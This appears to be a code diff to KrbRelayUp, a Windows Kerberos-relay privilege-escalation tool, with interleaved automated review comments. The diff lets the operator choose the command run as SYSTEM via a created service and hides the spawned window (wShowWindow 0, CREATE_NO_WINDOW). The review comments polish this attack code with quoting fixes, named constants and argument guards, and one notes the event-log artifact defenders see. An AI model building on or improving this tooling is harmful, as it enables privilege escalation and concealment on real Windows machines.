diff --git a/KrbRelayUp/KrbSCM.cs b/KrbRelayUp/KrbSCM.cs
index e45a7b4..93e379c 100644
--- a/KrbRelayUp/KrbSCM.cs
+++ b/KrbRelayUp/KrbSCM.cs
@@ -44,12 +44,13 @@ public static void Run()
 int oInitializeSecurityContext = Marshal.OffsetOf(typeof(SecurityFunctionTable), "InitializeSecurityContext").ToInt32();
 Marshal.Copy(bInitializeSecurityContext, 0, functionTable + oInitializeSecurityContext, bInitializeSecurityContext.Length);
- if (String.IsNullOrEmpty(Options.serviceCommand))
+ string exe = System.Reflection.Assembly.GetExecutingAssembly().Location;
+ int session_id = System.Diagnostics.Process.GetCurrentProcess().SessionId;
+ if(String.IsNullOrEmpty(Options.serviceCommand))
 {
- string exe = System.Reflection.Assembly.GetExecutingAssembly().Location;
- int session_id = System.Diagnostics.Process.GetCurrentProcess().SessionId;
- Options.serviceCommand = $"\"{exe}\" system {session_id}\n";
+ Options.serviceCommand = "cmd.exe";
 }
+ string spawnKrbrelaySystemCommand = $"\"{exe}\" system {session_id} \"" + Options.serviceCommand + "\"";
 IntPtr hScm = OpenSCManager("127.0.0.1", null, ScmAccessRights.Connect | ScmAccessRights.CreateService);
@@ -59,7 +60,9 @@ public static void Run()
 return;
 }
- IntPtr hService = CreateService(hScm, Options.serviceName, null, ServiceAccessRights.AllAccess, 0x10, ServiceBootFlag.DemandStart, ServiceError.Ignore, Options.serviceCommand, null, IntPtr.Zero, null, null, null);
+ Console.WriteLine($"[+] Service Name: {Options.serviceName}");
+
+ IntPtr hService = CreateService(hScm, Options.serviceName, null, ServiceAccessRights.AllAccess, 0x10, ServiceBootFlag.DemandStart, ServiceError.Ignore, spawnKrbrelaySystemCommand, null, IntPtr.Zero, null, null, null);
 if (hService == IntPtr.Zero)
 {
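Review bot: `spawnKrbrelaySystemCommand` wraps `Options.serviceCommand` in literal double quotes without escaping any quote the value already contains, so a value with an embedded `"` yields a command line that the System-phase `args[2]` parse splits differently than intended, and the expression mixes interpolation with `+` concatenation for no reason. Building it as one interpolated string, `string spawnKrbrelaySystemCommand = $"\"{exe}\" system {session_id} \"{Options.serviceCommand}\"";`, is clearer, and rejecting or escaping embedded quotes before concatenation turns the silent mis-split into an explicit error. The value is consumed by the CreateService call in the following hunk, where it becomes the service ImagePath; that path is recorded verbatim in the service-installation event log (System event 7045), which is the artifact a defender reviewing the host will see. Run() begins before this hunk.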
@@ -91,7 +94,7 @@ public static void Run()
 Console.WriteLine("[+] Clean-up done");
 }
- public static void RunSystemProcess(int session_id)
+ public static void RunSystemProcess(int session_id, string cmdline)
 {
 IntPtr hToken = IntPtr.Zero;
 if (!OpenProcessToken((IntPtr)(-1), 0x0002, out hToken))
@@ -113,14 +116,15 @@ public static void RunSystemProcess(int session_id)
 Console.WriteLine($"[-] Error setting session ID: {Marshal.GetLastWin32Error()}");
 return;
 }
+
 STARTUPINFO start_info = new STARTUPINFO();
 start_info.cb = Marshal.SizeOf(start_info);
 start_info.lpDesktop = "WinSta0\\Default";
- start_info.wShowWindow = 5;
+ start_info.wShowWindow = 0;
+ // string cmdline = "powershell.exe";
- string cmdline = "cmd.exe";
 PROCESS_INFORMATION proc_info = new PROCESS_INFORMATION();
- if (!CreateProcessAsUser(hPrimaryToken, null, cmdline, ref s, ref s, false, 0x00000010, IntPtr.Zero, null, ref start_info, out proc_info))
+ if (!CreateProcessAsUser(hPrimaryToken, null, cmdline, ref s, ref s, false, 0x08000000, IntPtr.Zero, null, ref start_info, out proc_info))
 {
 Console.WriteLine($"[-] Error creating process: {Marshal.GetLastWin32Error()}");
 return;
diff --git a/KrbRelayUp/Program.cs b/KrbRelayUp/Program.cs
index 7224b6b..952e8aa 100644
--- a/KrbRelayUp/Program.cs
+++ b/KrbRelayUp/Program.cs
@@ -234,11 +234,13 @@ static void Main(string[] args)
 ParseArgs(args);
+ Console.WriteLine($"[+] Command Line {Options.serviceCommand}");
+
 if (Options.phase == Options.PhaseType.System)
 {
 try
 {
- KrbSCM.RunSystemProcess(Convert.ToInt32(args[1]));
+ KrbSCM.RunSystemProcess(Convert.ToInt32(args[1]), args[2]);
 }
 catch { }
 return;
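Review bot: The commented-out line `// string cmdline = "powershell.exe";` is dead code now that `cmdline` is a parameter and should be deleted rather than left as a note, and the two literals this hunk changes, `0x08000000` in the CreateProcessAsUser call and `wShowWindow = 0`, are unexplained magic numbers next to the existing `0x0002` and `0x10`; declaring them as named constants (`const uint CREATE_NO_WINDOW = 0x08000000;`, `const short SW_HIDE = 0;`) makes the intent reviewable without a Win32 header at hand. The new `cmdline` parameter is also handed straight to CreateProcessAsUser with a null application name and no check, so an empty string from the caller surfaces only as a raw Win32 error code; a guard in the function's existing style, `if (String.IsNullOrEmpty(cmdline)) { Console.WriteLine("[-] Empty command line"); return; }`, reports it directly. RunSystemProcess is opened in the preceding hunk and its body continues past this one.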
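Review bot: `args[2]` is read with no length check, and the surrounding `catch { }` swallows the resulting IndexOutOfRangeException along with every other failure, so a malformed System-phase command line produces no diagnostic at all; guard it before the call, `if (args.Length < 3) { Console.WriteLine("[-] System phase expects <session_id> <command>"); return; }`, and at minimum write the exception to the console in the catch instead of discarding it. The new `[+] Command Line {Options.serviceCommand}` line is printed before the phase check, so it appears in every run, and it lacks the colon the other `[+]` messages use; the `[+] final command:` message added in the -394 hunk of the same file is inconsistent in the opposite direction (lowercase label). Main() starts before this hunk and continues past it.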
@@ -394,6 +396,9 @@ static void Main(string[] args)
 finalCommand = $"{finalCommand} --ServiceName \"{Options.serviceName}\"";
 if (!String.IsNullOrEmpty(Options.serviceCommand))
 finalCommand = $"{finalCommand} --ServiceCommand \"{Options.serviceCommand}\"";
+
+ Console.WriteLine($"[+] final command: {finalCommand}");
+
 Helpers.CreateProcessNetOnly(finalCommand, show: false, kirbiBytes: bFinalTicket);
 }
 else